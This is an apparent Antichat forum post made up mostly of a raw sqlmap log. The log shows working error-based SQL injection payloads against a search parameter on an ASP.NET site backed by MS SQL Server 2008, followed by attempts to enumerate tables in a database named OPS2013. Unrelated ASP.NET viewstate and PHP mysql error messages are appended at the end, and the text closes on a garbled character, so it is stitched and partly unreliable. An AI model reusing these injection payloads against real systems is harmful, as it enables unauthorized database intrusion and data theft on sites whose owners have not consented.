ANTICHAT — форум по информационной безопасности, OSINT и технологиям

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* ((custom) POST)
  Type: error-based
  Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)
  Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKMTQ2Mjg4MDUwOA9kFgICCA9kFgQCBA8PFgIeB1Zpc2libGVoZGQCDA8
WAh8AaGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFBkltYWdlMQ==&productselect=All&keywordsearch=fd' AND 7226
IN (SELECT (CHAR(113) CHAR(122) CHAR(120) CHAR(113) CHAR(113) (SELECT (CASE WHEN (7226=7226) THEN CHAR(49) ELSE CHAR(48
) END)) CHAR(113) CHAR(118) CHAR(118) CHAR(113) CHAR(113)))-- mvKE&Image1.x=11&Image1.y=14
  Vector: AND [RANDNUM] IN (SELECT ('[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))
---
[05:28:16] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[05:28:16] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: Microsoft IIS 7.5, ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
[05:28:16] [WARNING] missing table parameter, sqlmap will retrieve the number of entries for all database management sys
tem databases' tables
[05:28:16] [INFO] fetching tables for database: sfdsffsdf
[05:28:16] [PAYLOAD] fd' AND 4667 IN (SELECT (CHAR(113)+CHAR(122)+CHAR(120)+CHAR(113)+CHAR(113)+(SELECT ISNULL(CAST(COUN
T(OPS2013..sysusers.name+CHAR(46)+OPS2013..sysobjects.name) AS NVARCHAR(4000)),CHAR(32)) FROM OPS2013..sysobjects INNER
JOIN OPS2013..sysusers ON OPS2013..sysobjects.uid BETWEEN OPS2013 AND OPS2013..sysusers.uid WHERE OPS2013..sysobjects.xt
ype IN (CHAR(117),CHAR(118)))+CHAR(113)+CHAR(118)+CHAR(118)+CHAR(113)+CHAR(113)))-- ZTea
[05:28:16] [WARNING] reflective value(s) found and filtering out
[05:28:16] [WARNING] the SQL query provided does not return any output
[05:28:16] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch
'--hex'
[05:28:16] [PAYLOAD] fd' AND 9754 IN (SELECT (CHAR(113)+CHAR(122)+CHAR(120)+CHAR(113)+CHAR(113)+(SELECT ISNULL(CAST(COUN
T(name) AS NVARCHAR(4000)),CHAR(32)) FROM OPS2013..sysobjects WHERE xtype BETWEEN CHAR AND CHAR(85))+CHAR(113)+CHAR(118)
+CHAR(118)+CHAR(113)+CHAR(113)))-- jCfI
[05:28:17] [WARNING] the SQL query provided does not return any output
[05:28:17] [CRITICAL] unable to retrieve the tables for any database

'System.Web.HttpException: Validation of viewstate MAC failed. If this application is hosted by a Web Farm or cluster, ensure that  configuration specifies the same validationKey and validation algorithm. AutoGenerate cannot be used in a cluster'

Warning:  implode() [function.implode]: Invalid arguments passed in /home/web/site/www/modules/filmnews.php on line 42

Warning:  mysql_num_rows() expects parameter 1 to be resource, boolean given in /home/web/site/www/modules/filmnews.php on line 43

�